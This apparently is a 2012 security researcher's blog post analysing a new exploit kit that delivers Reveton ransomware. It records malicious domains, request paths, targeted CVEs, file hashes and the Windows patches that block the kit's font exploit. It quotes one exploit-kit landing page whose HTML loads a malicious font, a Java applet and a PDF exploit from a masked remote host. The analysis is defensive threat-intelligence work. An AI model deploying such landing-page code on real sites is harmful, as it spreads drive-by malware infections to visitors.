 |
| Just for the left panel Thumbnail :) |
 |
| Stats page title |
Sorry for the "read it live" post...the situation was moving while writing.
Few days ago i discovered that a bunch of reverse proxies that I was linking to same Blackhole Exploit Kit were in fact linked to 2 different Blackhole (quite surely operated by same team - I saw reverse proxies being redirected from one server to another one)
Trying to build a signature to know which server was behind a specific reverse, I found a new exploit kit.
 |
| Empty default stats |
I fast noticed few things.
/r/pricelist.php is a PDF exploit.
/r/myadv.php is a Java pack.
/font.php is a Reveton PE.
I thought it would take weeks before it goes wild..but yesterday Malekal catched a landing spreading Reveton (blood.falawllp.info /r/l/town-proved.php ) and I immediately recognized that new EK. So I hunted the malvertising and found another domain but same landing pointing to an already known Reverse Proxy.
Seems like it was time to take a deep look at this EK.
Small improvement, it looks like the "Sploit pack" is being checked by tools like Scan4you.
When i first checked it, payload was not being pushed (all night long : no payload)
CVE-2012-4681 - IE - WinXP 32b
try.addsdice.com /r/l/town-proved.php <-- try.addsdice.com full of meaning no ?try.addsdice.com /r/32size_font.eot <- ?
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/myadv.php.pack.gz <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/l//r/f.php?k=1 <-- Vuln tracer for owner (seems guest does not have access to vuln break %)
CVE-2012-4681 - Firefox - WinXP 32b
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/l//r/f.php?k=1
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/l//r/f.php?k=2
CVE-2012-1723 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /favicon.ico
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/f.php?k=4
MDAC (you should not be hurt):
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/32size_font.eot
21x.xx.11x.1xx /r/pricelist.php
Not up to date Win7 64b - IE - (j7u7)
Note that there is NO payload on the EK right now, don't known how to be 100% sure the CVE is indeed active and that it's this CVE which is being used or a new thing...
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/64size_font.eot
try.addsdice.com /r/pricelist.php
try.addsdice.com /favicon.ico
try.addsdice.com /r/f.php?k=4 <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
town-proved.php with IE contains :
<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style></head><body onload='try{window.focus();}catch(e){}'><div class='duqu'>:)</div><applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet><br><br><iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe></body></html>
 |
| Source code of the landing pushed to IE on x64 windows |
.duqu <- aouch, eactly what we could expect from a font drop !
 |
| Cool EK Tree |
file.dll is a Reveton.
myadv.php (jar) - at least CVE-2012-4681, CVE-2012-507, CVE-2012-1723
 |
| CVE-2012-4681 spotted in jar file from Cool EK |
filelist.php (pdf) - CVE-2010-0188
3bffc22ce0e67144c1b10da968f32f4c (2012-10-03) - http://wepawet.iseclab.org/view.php?hash=3bffc22ce0e67144c1b10da968f32f4c&t=1349739053&type=js
32size_font.eot : 050fbef5c814b2981fa61b7fc6820cbd
64size_font.eot : fada0b184b5372863a0c51f7fef5e2d0
How good is the "breaking" percentage ?
 |
| Guest stats on 1 thread (we can estimte that it's Reveton Infection via one Traffer) |
Stats are moving and i can't get infected by that thread. Look like they are testing the EK in Traffic Analyser mode.
[EDIT - While Writing this post]
Around 10am French time got infected. As expected : Reveton.
So the Exploit Kit moved to production mode again.
Tried to run the landing on a CVE-2011-3402 positive computer with java 7u7 got infected (but it's not Java)
Payload: f15df53d8cca428d2dbe924fe1dff733
 |
| Reveton for those who do not know (look botnets.fr/index.php/Reveton) |
Run it on a Fully patched IE 8/Windows on Win 64 and java 7u7 Not infection.
Tried to run the landing on a "Not up to date Win7 x64" positives computer without java : got infected
Payload : 106f1f7e3a24d1ae9af0efc0934a4dcb
 |
| Call Home from that Reveton payload. |
Around 10:30 am : Malekal just found a new domain matching a known Reverse proxy that just switched from one BH EK server to this BH + Cool EK server.
I do not know what this font is about.
Is this a "new (?)" enabler for CVE-2012-4969. Is this another patched vuln from Internet Explorer ?
Am getting help to sort this out. Will update this post.
<edit1> got answer by Kaspersky Labs : it's CVE-2011-3402
so I s/CVE-2012-4969/CVE-2011-3402 this post...yes not ethical ;)
On my MDAC VM :
 |
| KB2676562 fix CVE-2011-3402 |
</edit1>
<edit2>
After fighting hours with Updates and this EK (that was not Cool trust me) i came to conclusion that's it's not only CVE-2011-3402, and that explain maybe the "not so good" percentage of break.
It seems that if you have at least one of this component installed, you are not vuln to the "Duqu-like" font drop :
-KB2676562 - CVE-2011-3402
-KB2744842 - CVE-2012-4969
-KB2718523 - CVE-2012-1893/CVE-2012-1890
-Windows Explorer 9.0
 |
| Downgrading a Windows 7x64 bits to see required "missing" KB to get owned -= mean i removed this Patch. |
</edit2>
